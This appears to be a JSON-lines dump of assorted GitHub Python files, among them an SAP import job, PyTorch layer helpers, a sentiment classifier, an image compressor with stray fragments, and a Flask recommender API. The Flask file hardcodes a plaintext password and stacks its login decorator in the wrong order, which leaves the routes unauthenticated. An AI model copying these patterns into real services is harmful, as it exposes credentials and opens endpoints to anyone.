people_to_ignore:\n # e.g. those with wrong MG/MU\n logger.debug(\"Invalid person with sap_id=%s\", tpl.sap_ansattnr)\n continue\n\n # just like process_affiliations\n ou_id = get_ou_id(tpl.sap_ou_id)\n if ou_id is None:\n logger.debug(\"No OU registered for SAP ou_id=%s\", tpl.sap_ou_id)\n continue\n\n person = get_person(tpl.sap_ansattnr)\n if person is None:\n logger.debug(\"No person is registered for SAP ansatt# %s\",\n tpl.sap_ansattnr)\n continue\n\n synchronise_employment(employment_cache, tpl, person, ou_id)\n # Add person to employee-set, which is later used by\n # populate_work_titles()\n if person not in employees:\n employees.add(person)\n\n remove_db_employments(employment_cache)\n logger.debug(\"done with employments\")\n\n\ndef populate_work_titles():\n \"\"\"\n Calculates the main employment entry for every person listed in the\n source file, and adds the description as the person's work_title.\n We first try to check which employment is defined as the person's main one.\n If no employment entry is defined as the main employment, we look through\n the other employments and use the entry with the highest percentage number.\n If several entries with an equal percentage number exists for a given\n person, the first one encountered is used.\n \"\"\"\n logger.debug('Populating work_titles...')\n logger.debug('Number of persons to set titles for: %d' % len(employees))\n for person in employees:\n main_employment = None\n employments = person.search_employment(person.entity_id,\n main_employment=True)\n for employment in employments:\n if main_employment is None or \\\n employment['percentage'] > main_employment['percentage']:\n main_employment = employment\n if main_employment is None:\n employments = person.search_employment(person.entity_id)\n for employment in employments:\n if main_employment is None or \\\n employment['percentage'] > main_employment['percentage']:\n main_employment = employment\n if main_employment is not None:\n person.add_name_with_language(name_variant=constants.work_title,\n name_language=constants.language_nb,\n name=main_employment['description'])\n person.write_db()\n logger.debug(\"Adding %s '%s' to person with entity_id %d\" %\n (str(constants.work_title),\n main_employment['description'],\n person.entity_id))\n\n\ndef main():\n global logger\n logger = Factory.get_logger('cronjob')\n\n parser = argparse.ArgumentParser(description=__doc__)\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('-e', '--employment-file',\n dest='employment_file',\n required=True,\n help='File containing employment data-export '\n 'from SAP.')\n required_args.add_argument('-p', '--person-file', dest='person_file',\n required=True,\n help='File containing person data-export '\n 'from SAP.')\n parser.add_argument('--without-fok', dest='use_fok', action='store_false',\n help='Do not use forretningsområdekode for checking '\n 'if a person should be imported. (default: use.)')\n parser.set_defaults(use_fok=True)\n parser.add_argument('--with-employment', dest='sync_employment',\n action='store_true',\n help='Synchronise person employments based '\n 'on specified employment-file.')\n parser.set_defaults(sync_employment=False)\n parser.add_argument('-c', '--commit', dest='commit', action='store_true',\n help='Write changes to DB.')\n args = parser.parse_args()\n\n assert (args.person_file is not None and\n os.access(args.person_file, os.F_OK))\n assert (args.employment_file is not None and\n os.access(args.employment_file, os.F_OK))\n\n global database\n database = Factory.get(\"Database\")()\n database.cl_init(change_program=\"import_SAP\")\n\n global constants\n constants = Factory.get(\"Constants\")()\n\n global employees\n employees = set()\n\n if getattr(cereconf, 'SAP_MG_MU_CODES', None) and args.use_fok:\n raise Exception(\"Use of both MG/MU codes and fok isn't implemented\")\n\n ignored_people = load_invalid_employees(file(args.person_file),\n args.use_fok)\n\n if args.sync_employment:\n process_employments(args.employment_file,\n args.use_fok,\n ignored_people)\n populate_work_titles()\n\n process_affiliations(args.employment_file,\n args.person_file,\n args.use_fok,\n ignored_people)\n\n if args.commit:\n database.commit()\n logger.info(\"All changes committed\")\n else:\n database.rollback()\n logger.info(\"All changes rolled back\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"unioslo/cerebrum","sub_path":"contrib/no/hia/process_SAP_affiliations.py","file_name":"process_SAP_affiliations.py","file_ext":"py","file_size_in_byte":20223,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"20631726384","text":"import torch.nn as nn\n\n\ndef get_conv(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True,\n dim='2d',\n):\n \"\"\"Get Conv layer.\"\"\"\n return eval(f'nn.Conv{dim}')(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=kernel_size // 2,\n dilation=dilation,\n groups=groups,\n bias=bias,\n )\n\n\ndef get_deconv(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True,\n dim='2d',\n):\n \"\"\"Get Conv layer.\"\"\"\n return eval(f'nn.ConvTranspose{dim}')(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=kernel_size // 2,\n output_padding=stride - 1,\n dilation=dilation,\n groups=groups,\n bias=bias,\n )\n\n\ndef get_normalizer(norm, channels, groups=16, dim='2d'):\n \"\"\"Get normalization layer.\"\"\"\n if norm == '':\n return nn.Identity()\n elif norm == 'bn':\n return eval(f'nn.BatchNorm{dim}')(channels)\n elif norm == 'gn':\n # 16 is taken from Table 3 of the GN paper\n return nn.GroupNorm(groups, channels)\n elif norm == 'in':\n return eval(f'nn.InstanceNorm{dim}')(channels)\n elif norm == 'ln':\n return nn.LayerNorm(channels)\n else:\n raise ValueError(f'Normalizer {norm} not supported!')\n\n\ndef get_act_func(act):\n \"\"\"Get activation function.\"\"\"\n if act == '':\n return nn.Identity()\n if act == 'relu':\n return nn.ReLU()\n elif act == 'leakyrelu':\n return nn.LeakyReLU()\n elif act == 'tanh':\n return nn.Tanh()\n elif act == 'sigmoid':\n return nn.Sigmoid()\n elif act == 'swish':\n return nn.SiLU()\n elif act == 'elu':\n return nn.ELU()\n elif act == 'softplus':\n return nn.Softplus()\n elif act == 'mish':\n return nn.Mish()\n elif act == 'gelu':\n return nn.GELU()\n else:\n raise ValueError(f'Activation function {act} not supported!')\n\n\ndef conv_norm_act(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n norm='bn',\n act='relu',\n dim='2d',\n):\n \"\"\"Conv - Norm - Act.\"\"\"\n conv = get_conv(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n dilation=dilation,\n groups=groups,\n bias=norm not in ['bn', 'in'],\n dim=dim,\n )\n normalizer = get_normalizer(norm, out_channels, dim=dim)\n act_func = get_act_func(act)\n return nn.Sequential(conv, normalizer, act_func)\n\n\ndef deconv_norm_act(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n norm='bn',\n act='relu',\n dim='2d',\n):\n \"\"\"ConvTranspose - Norm - Act.\"\"\"\n deconv = get_deconv(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n dilation=dilation,\n groups=groups,\n bias=norm not in ['bn', 'in'],\n dim=dim,\n )\n normalizer = get_normalizer(norm, out_channels, dim=dim)\n act_func = get_act_func(act)\n return nn.Sequential(deconv, normalizer, act_func)\n\n\ndef fc_norm_act(in_features, out_features, norm='bn', act='relu'):\n \"\"\"FC - Norm - Act.\"\"\"\n fc = nn.Linear(in_features, out_features, bias=norm not in ['bn', 'in'])\n normalizer = get_normalizer(norm, out_features, dim='1d')\n act_func = get_act_func(act)\n return nn.Sequential(fc, normalizer, act_func)\n\n\ndef build_mlps(in_channels, hidden_sizes, out_channels, norm='bn', act='relu'):\n \"\"\"Construct MLP with norm and act.\"\"\"\n if not hidden_sizes: # None or empty list\n return nn.Linear(in_channels, out_channels)\n modules = [fc_norm_act(in_channels, hidden_sizes[0], norm=norm, act=act)]\n for i in range(0, len(hidden_sizes) - 1):\n modules.append(\n fc_norm_act(\n hidden_sizes[i], hidden_sizes[i + 1], norm=norm, act=act))\n modules.append(nn.Linear(hidden_sizes[-1], out_channels))\n return nn.Sequential(*modules)\n","repo_name":"Wuziyi616/nerv","sub_path":"nerv/models/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"73410957372","text":"import os\nimport sys\n\nfrom distutils.core import setup\n\n\ndef fullsplit(path, result=None):\n \"\"\"\n Split a pathname into components (the opposite of os.path.join)\n in a platform-neutral way.\n \"\"\"\n if result is None:\n result = []\n head, tail = os.path.split(path)\n if head == '':\n return [tail] + result\n if head == path:\n return result\n return fullsplit(head, [tail] + result)\n\n\n# Compile the list of packages available, because distutils doesn't have\n# an easy way to do this.\npackages, package_data = [], {}\n\nroot_dir = os.path.dirname(__file__)\nif root_dir != '':\n os.chdir(root_dir)\ncclint_dir = 'cclint'\n\nfor dirpath, dirnames, filenames in os.walk(cclint_dir):\n # Ignore PEP 3147 cache dirs and those whose names start with '.'\n dirnames[:] = [d for d in dirnames if \\\n not d.startswith('.') and d != '__pycache__']\n parts = fullsplit(dirpath)\n package_name = '.'.join(parts)\n if '__init__.py' in filenames:\n packages.append(package_name)\n elif filenames:\n relative_path = []\n while '.'.join(parts) not in packages:\n relative_path.append(parts.pop())\n relative_path.reverse()\n path = os.path.join(*relative_path)\n package_files = package_data.setdefault('.'.join(parts), [])\n package_files.extend([os.path.join(path, f) for f in filenames])\n\nsetup(\n name='cclint',\n version='0.4',\n description=\"An enhanced version of the Goggle's cpplint tool\",\n author='Olli Wang',\n author_email='olliwang@ollix.com',\n url='https://github.com/ollix/cclint',\n license='BSD',\n packages=packages,\n install_requires=[\n 'colorama',\n 'cpplint'\n ],\n scripts=['cclint/bin/cclint'],\n entry_points={\n 'console_scripts': [\n 'cclint = cclint:command.execute_from_command_line',\n ],\n },\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Topic :: Terminals',\n ]\n)\n","repo_name":"ollix/cclint","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"13364729047","text":"from collections import defaultdict\n\n\nclass Solution(object):\n def validTree(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: bool\n \"\"\"\n edges_dict = defaultdict(list)\n for e in edges:\n edges_dict[e[0]].append(e[1])\n edges_dict[e[1]].append(e[0])\n\n def dfs(node, prev):\n # use prev here since this is undirected graph and we want\n # to avoid travel back using the same edge.\n visited.add(node)\n if node in edges_dict:\n for next in edges_dict[node]:\n if next == prev:\n continue\n if next in visited:\n return False\n if not dfs(next, node):\n return False\n return True\n\n # here since any connected graph without simple cycles is a tree\n # we can just do dfs starting at any node.\n visited = set()\n if not dfs(0, None):\n return False\n return len(visited) == n\n\n\nif __name__ == '__main__':\n print(Solution().validTree(5, [[0, 1], [0, 2], [0, 3], [1, 4]]))\n print(Solution().validTree(5, [[0, 1], [1, 2], [2, 3], [1, 3], [1, 4]]))\n","repo_name":"ruiwanguiuc/LeetCode","sub_path":"graph_valid_tree.py","file_name":"graph_valid_tree.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73638582972","text":"import NLP_Scraping\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize\nfrom nltk import WordNetLemmatizer\nimport string\nimport random\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom contextlib import closing\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\n#import urllib2\nimport urllib.request,urllib.parse,urllib.error\nimport re\nfrom bs4 import BeautifulSoup\nimport unicodedata\nfrom sklearn.externals import joblib as jb\n\n\n\ndata = pd.read_csv(r\"C:\\Users\\nauri\\Desktop\\ML proj\\Amazon_Unlocked_Mobile.csv\")\nX = data['Reviews'][:]\nY = data['Rating'][:]\n\nfor i in range(len(Y)):\n temp = Y[i]\n temp = int(temp)\n if temp >= 3:\n temp = 1\n elif temp < 3:\n temp = 0\n Y[i] = temp\n\n\ndef preprocessing(text):\n \n # tokenize into words\n tokens = str(text).split()\n for i,word in enumerate(tokens):\n if (word in ['not','no'] or \"n't\" in word) and (i != len(tokens) - 1):\n tokens.append(\"not_\" + tokens[i+1])\n del tokens[i]\n del tokens[i+1]\n\n # remove stopwords\n stop = stopwords.words('english')\n tokens = [token for token in tokens if token not in stop]\n\n # remove words less than three letters\n tokens = [word for word in tokens if len(word) >= 3]\n\n # lower capitalization\n tokens = [word.lower() for word in tokens]\n\n # lemmatize\n lmtzr = WordNetLemmatizer()\n tokens = [lmtzr.lemmatize(word) for word in tokens]\n preprocessed_text= ' '.join(tokens)\n\n return preprocessed_text \n\nprint(\"Processing text data...\")\nfor i in range(len(X)):\n temp = X[i]\n X[i] = preprocessing(temp)\n\nprint(\"Splitting Dataset for training and testing...\")\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.25, random_state = 0)\n\n \nvectorizer = TfidfVectorizer(max_features=2900)\ntrain_X=vectorizer.fit_transform(X_train)\ntest_X=vectorizer.transform(X_test)\n\n\nMNB = MultinomialNB()\n\nprint(\"Training classifier...\")\nMNB.fit(train_X, y_train)\n\njb.dump(MNB, 'pickled_model.pkl')\nprint(\"The model has been pickled for further testing...\")\n\npred = MNB.predict(test_X)\n\nprint(\"The accuracy of our classifier is as follows : \", accuracy_score(y_test,pred))\n\ndF_review = pd.read_csv(r\"C:\\Users\\nauri\\source\\repos\\NLP_Scraping\\NLP_Scraping\\Review(Content - Redmi Note 5 Pro).csv\")\nprint(\"Predicting Comment data from scraping...\")\nFtext = []\nfor i in range(dF_review.shape[0]):\n temp = dF_review['Review Content'][i]\n pred_data = preprocessing(temp)\n Ftext.append(pred_data)\n\ncamera_file = open(r\"Camera words.txt\", \"r\")\nfilter = camera_file.read().split('\\n')\n\nFtext_camera = []\nfor l in Ftext:\n camera_text = l.split(\".\")\n for c in camera_text:\n for w in filter:\n if w in c and c not in Ftext_camera:\n Ftext_camera.append(c)\n\nFtext=vectorizer.transform(Ftext)\nFtext_camera=vectorizer.transform(Ftext_camera)\n\npred_res = MNB.predict(Ftext)\npred_camera = MNB.predict(Ftext_camera)\nprint(\"The Predictions for each comment are as follows :-\")\nprint(pred_res)\nprint(len(pred_res))\nprint(\"The Predictions for all camera related comments are as follows :-\")\nprint(len(pred_camera))\n\nsum = 0\nsum1 = 0\nfor i in pred_res:\n sum = sum + i\nrating = sum/len(pred_res)\nrating = rating * 5\nprint (\"Rating out of 5 is :- \", rating)\nfor i in pred_camera:\n sum1 = sum1 + i\nrating1 = sum1/len(pred_camera)\nrating1 = rating1 * 5 \nprint (\"Rating out of 5 for camera is :- \", rating1)\n\n#total_neg = 0\n#total_pos = 0\n#for i in pred_res:\n# if i == 0:\n# total_neg = total_neg + 1\n# elif i == 1:\n# total_pos = total_pos + 1\n\n#total_neg1 = 0\n#total_pos1 = 0\n#for i in pred_camera:\n# if i == 0:\n# total_neg1 = total_neg1 + 1\n# elif i == 1:\n# total_pos1 = total_pos1 + 1\n#import matplotlib.pyplot as plt\n#objects = ['Positive','Negative']\n#y_pos = np.arange(len(objects))\n\n#plt.bar(y_pos,[total_pos,total_neg],alpha=0.5)\n#plt.xticks(y_pos,objects)\n#plt.ylabel('Number')\n#plt.title('Number of Postive and Negative Reviews')\n\n#plt.show()","repo_name":"Composer117/Mobile_reviewer","sub_path":"Sentiment_prog/Mobile_Reviewer.py","file_name":"Mobile_Reviewer.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21840884014","text":"import os\nimport sys\nimport cv2\nimport subprocess\n\nimport string\nimport secrets\n\ndef pass_gen(size=12):\n chars = string.ascii_uppercase + string.ascii_lowercase + string.digits \\\n #+ '%&$#()'\n return ''.join(secrets.choice(chars) for x in range(size))\n\ndef compare_ext(src_ext, dst_ext):\n \"\"\"\n An error occurs because the extension conversion is not supported\n \"\"\"\n if not src_ext == dst_ext:\n return 1\n return 0\n\ndef open_image(dst_file_name):\n cmd = [\"open\", dst_file_name]\n res = subprocess.call(cmd)\n\n\"\"\"\n__all__ = [\"settings\"]\n\n\ndef get_user_email(user):\n email_field_name = get_user_email_field_name(user)\n return getattr(user, email_field_name, None)\n\n\ndef get_user_email_field_name(user):\n return user.get_email_field_name()\n\"\"\"\n \ndef compress_image(args):\n \"\"\"\n Image compression processing function\n \"\"\"\n channel = 1\n src_file_name = args.input\n dst_file_name = args.output\n\n # Compare extensions\n src_path, src_ext = os.path.splitext(src_file_name)\n dst_path, dst_ext = os.path.splitext(dst_file_name)\n\n if compare_ext(src_ext, dst_ext):\n print(\"[FAILED] : Invarid extensions\", src_ext, dst_ext)\n sys.exit(1)\n\n img = cv2.imread(src_file_name)\n\n (result, encimg) = cv2.imencode('.jpg', img, [\n int(cv2.IMWRITE_JPEG_QUALITY),\n int(args.quality)\n ])\n\n if result is False:\n return (1)\n\n dst = cv2.imdecode(encimg, channel)\n\n # Image writing process\n cv2.imwrite(dst_file_name, dst)\n\n if args.open:\n open_image(dst_file_name)\n\nurlpatterns = [\n url(\n r\"^o/(?P\\S+)/$\",\n views.ProviderAuthView.as_view(),\n name=\"provider-auth\",\n )\n]\n\nclass TokenStrategy:\n pass\n","repo_name":"ryuichi1208/ImgConversion","sub_path":"src/compress_image.py","file_name":"compress_image.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"44557471458","text":"#! /usr/bin/env python\n# from gevent import monkey\n# monkey.patch_all()\n\nimport os\nimport json\n\nfrom flask import Flask, request, jsonify\nfrom flasgger import Swagger\nfrom flask_httpauth import HTTPBasicAuth\n\n\napp = Flask(__name__, static_folder=os.path.join(os.getcwd(), 'static'))\napp.config['SWAGGER'] = {\n # set to True so instead of\n # $ref: '#/definitions/alert'\n # we get\n # $ref: '#/definitions/index_post_alert'\n 'prefix_ids': True\n}\nSwagger(app)\n\nAPP_ROOT = os.path.dirname(os.path.realpath(__file__))\n\n# AUTHENTICATION\nauth = HTTPBasicAuth()\nusers = {\n \"mtambos\": \"agtd%dfgkjhRE85$§XXC6\"\n}\n\n\n@auth.get_password\ndef get_pw(username):\n if username in users:\n return users.get(username)\n return None\n\n\n@app.before_request\ndef before_request():\n print(f\"Request received to {request.path}.\")\n\n\n@auth.login_required\n@app.route('/recommend', methods=['POST'])\ndef recommend():\n \"\"\"\n Given a document, returns a list of recommendations.\n ---\n tags:\n - recommend\n parameters:\n - in: body\n name: body\n schema:\n id: doc\n required:\n - content\n - num\n properties:\n content:\n type: string\n description: list of characteristics important to the user.\n num:\n type: integer\n description: number of recommendations to return.\n default: 10\n responses:\n 200:\n description: recommendations\n schema:\n type: array\n items:\n $ref: '#/definitions/Recommendation'\n \"\"\"\n from recommender import content_engine\n content = request.json['content']\n num_predictions = request.json.get('num', 10)\n return jsonify(content_engine.recommend(content, num_predictions))\n\n\n@auth.login_required\n@app.route('/train//', methods=['GET'])\ndef train(data_url):\n \"\"\"\n Train the recommender with the given data.\n ---\n tags:\n - train\n parameters:\n - name: data_url\n in: path\n type: string\n required: true\n responses:\n 200:\n description: OK if successfully finished.\n type: string\n \"\"\"\n from recommender import content_engine\n content_engine.train(data_url)\n return \"OK\"\n\n\n# API ENDPOINTS\n@auth.login_required\n@app.route('/')\ndef index():\n status_message = json.dumps({'status': \"200\"})\n return str(status_message)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"mtambos/sample_recommender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9045901764","text":"class myclass:\n\tdef __init__(self, *ar):\n\t\tmylist = []\n\n\t\tfor n in ar:\n\t\t\tmylist.append(n)\n\t\t\n\t\tself.mylist = mylist\n\n\tdef sumdata(self):\n\t\tsum_result = 0\n\n\t\tfor n in self.mylist:\n\t\t\tsum_result += n\n\n\t\treturn sum_result\n\n\nb = myclass(4, 2, 3)\nprint(b.mylist)\nprint(b.sumdata())","repo_name":"RyanInWinter/python1018","sub_path":"3일차/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20107230254","text":"#!/usr/bin/python3\n\n# 将所有hostname 去重集合于 hostname数据表并填充标识\n# 数据来源: pro2与hostname/res目录\n# 只提取与starlink相关的starlinkisp.net与undefined...\n# cat ../hostname/res/hostname* | python3 -u hostinfo.py\n\n\nfrom sys import path\npath.append(r\"/home/ubuntu/Academic/starlink\")\n\nfrom utility import *\nfrom typing import *\n\n\ndef read_stdin() -> List:\n \"\"\" \"\"\"\n res = []\n while True:\n try:\n text = input()\n hostname = text.split(' ')[1]\n res.append(hostname)\n except:\n break\n \n res = list(set(res))\n try:\n res.remove(None)\n except:\n pass\n \n return res\n\n\ndef read_pro2(database: starlink_db, table='pro2'):\n \"\"\" \n null数据返回 None\n\n \"\"\"\n query = \"SELECT hostname from {}\".format(table)\n res = database.select(query)\n\n res = [ele[0] for ele in res]\n res = list(set(res))\n try:\n res.remove('')\n res.remove(None)\n except:\n pass\n\n return res\n\n\ndef parse(hostname) -> str:\n \"\"\"\n \n \"\"\"\n\n if 'customer' in hostname:\n if 'mc' in hostname:\n return 'customer-mc'\n if 'pop' in hostname:\n return 'customer-pop'\n \n if 'undefined' in hostname:\n return 'undefined'\n \n return ''\n\n\ndef upload(hostname, id, database: starlink_db, table='hostname'):\n \"\"\" \"\"\"\n query_base = \"INSERT IGNORE into {} \\\n (identifier, hostname) values \\\n ('{}', '{}')\"\n query = query_base.format(table, id, hostname)\n\n try:\n database.insert(query)\n except:\n print(query)\n # 继续运行,抛弃错误数据\n # exit(1)\n\n\ndef main():\n database = starlink_db()\n\n stdin_list = read_stdin()\n pro2_list = read_pro2(database)\n\n hostnames = stdin_list + pro2_list\n hostnames = list(set(hostnames))\n\n print('--- num of hostnames:', len(hostnames))\n\n hostname = 'undefined.hostname.localhost'\n id = parse(hostname)\n upload(hostname, id ,database)\n\n for hostname in hostnames:\n id = parse(hostname)\n upload(hostname, id ,database)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lazypip/starCollect","sub_path":"lookup/hostname.py","file_name":"hostname.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37370523140","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\n# EfficientNet B5\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n basemodel_name = 'tf_efficientnet_b5_ap'\n basemodel = torch.hub.load('rwightman/gen-efficientnet-pytorch', basemodel_name, pretrained=True)\n # Remove last layer\n basemodel.global_pool = nn.Identity()\n basemodel.classifier = nn.Identity()\n self.original_model = basemodel\n\n def forward(self, x):\n features = [x]\n for k, v in self.original_model._modules.items():\n if (k == 'blocks'):\n for ki, vi in v._modules.items():\n features.append(vi(features[-1]))\n else:\n features.append(v(features[-1]))\n return features\n\n\n# Decoder block with batch norm\nclass UpSampleBN(nn.Module):\n def __init__(self, skip_input, output_features):\n super(UpSampleBN, self).__init__()\n self._net = nn.Sequential(nn.Conv2d(skip_input, output_features, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(output_features),\n nn.LeakyReLU(),\n nn.Conv2d(output_features, output_features, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(output_features),\n nn.LeakyReLU())\n\n def forward(self, x, concat_with):\n up_x = F.interpolate(x, size=[concat_with.size(2), concat_with.size(3)], mode='bilinear', align_corners=True)\n f = torch.cat([up_x, concat_with], dim=1)\n return self._net(f)\n\n\n# Decoder block with group norm + weight standardization\nclass UpSampleGN(nn.Module):\n def __init__(self, skip_input, output_features):\n super(UpSampleGN, self).__init__()\n self._net = nn.Sequential(Conv2d(skip_input, output_features, kernel_size=3, stride=1, padding=1),\n nn.GroupNorm(8, output_features),\n nn.LeakyReLU(),\n Conv2d(output_features, output_features, kernel_size=3, stride=1, padding=1),\n nn.GroupNorm(8, output_features),\n nn.LeakyReLU())\n\n def forward(self, x, concat_with):\n up_x = F.interpolate(x, size=[concat_with.size(2), concat_with.size(3)], mode='bilinear', align_corners=True)\n f = torch.cat([up_x, concat_with], dim=1)\n return self._net(f)\n\n\n# Conv2d with weight standardization\nclass Conv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True):\n super(Conv2d, self).__init__(in_channels, out_channels, kernel_size, stride,\n padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2,\n keepdim=True).mean(dim=3, keepdim=True)\n weight = weight - weight_mean\n std = weight.view(weight.size(0), -1).std(dim=1).view(-1, 1, 1, 1) + 1e-5\n weight = weight / std.expand_as(weight)\n return F.conv2d(x, weight, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n\n# Upsample depth via bilinear upsampling\ndef upsample_depth_via_bilinear(depth, up_mask, downsample_ratio):\n return F.interpolate(depth, scale_factor=downsample_ratio, mode='bilinear', align_corners=True)\n\n\n# Upsample depth via learned upsampling\ndef upsample_depth_via_mask(depth, up_mask, downsample_ratio):\n # depth: low-resolution depth (B, 2, H, W)\n # up_mask: (B, 9*k*k, H, W)\n k = downsample_ratio\n\n N, o_dim, H, W = depth.shape\n up_mask = up_mask.view(N, 1, 9, k, k, H, W)\n up_mask = torch.softmax(up_mask, dim=2) # (B, 1, 9, k, k, H, W)\n\n up_depth = F.unfold(depth, [3, 3], padding=1) # (B, 2, H, W) -> (B, 2 X 3*3, H*W)\n up_depth = up_depth.view(N, o_dim, 9, 1, 1, H, W) # (B, 2, 3*3, 1, 1, H, W)\n up_depth = torch.sum(up_mask * up_depth, dim=2) # (B, 2, k, k, H, W)\n\n up_depth = up_depth.permute(0, 1, 4, 2, 5, 3) # (B, 2, H, k, W, k)\n return up_depth.reshape(N, o_dim, k*H, k*W) # (B, 2, kH, kW)\n\n\n# Decoder\nclass Decoder(nn.Module):\n def __init__(self, num_classes, downsample_ratio, learned_upsampling, BN, dnet):\n super(Decoder, self).__init__()\n features = 2048\n bottleneck_features = 2048\n self.downsample_ratio = downsample_ratio\n self.dnet = dnet\n\n if BN:\n print('using BatchNorm')\n UpSample = UpSampleBN\n else:\n print('using GroupNorm')\n UpSample = UpSampleGN\n\n # decoder architecture\n if self.downsample_ratio == 8:\n i_dim = features // 4\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n\n elif self.downsample_ratio == 4:\n i_dim = features // 8\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n self.up3 = UpSample(skip_input=features // 4 + 40, output_features=features // 8)\n\n elif self.downsample_ratio == 2:\n i_dim = features // 16\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n self.up3 = UpSample(skip_input=features // 4 + 40, output_features=features // 8)\n self.up4 = UpSample(skip_input=features // 8 + 24, output_features=features // 16)\n\n else:\n raise Exception('downsample ratio invalid')\n\n # depth prediction \n self.depth_head = nn.Sequential(\n nn.Conv2d(i_dim, h_dim, 3, padding=1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, h_dim, 1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, num_classes, 1),\n )\n\n # upsampling\n if learned_upsampling:\n self.mask_head = nn.Sequential(\n nn.Conv2d(i_dim, h_dim, 3, padding=1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, h_dim, 1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, 9 * self.downsample_ratio * self.downsample_ratio, 1)\n )\n self.upsample_depth = upsample_depth_via_mask\n else:\n self.mask_head = lambda a: None\n self.upsample_depth = upsample_depth_via_bilinear\n\n def forward(self, features):\n x_block0, x_block1, x_block2, x_block3, x_block4 = features[4], features[5], features[6], features[8], features[11]\n\n if self.downsample_ratio == 8:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_feat = self.up2(x_d1, x_block2)\n elif self.downsample_ratio == 4:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_d2 = self.up2(x_d1, x_block2)\n x_feat = self.up3(x_d2, x_block1)\n elif self.downsample_ratio == 2:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_d2 = self.up2(x_d1, x_block2)\n x_d3 = self.up3(x_d2, x_block1)\n x_feat = self.up4(x_d3, x_block0)\n else:\n raise Exception('downsample ratio invalid')\n\n depth = self.depth_head(x_feat)\n\n if 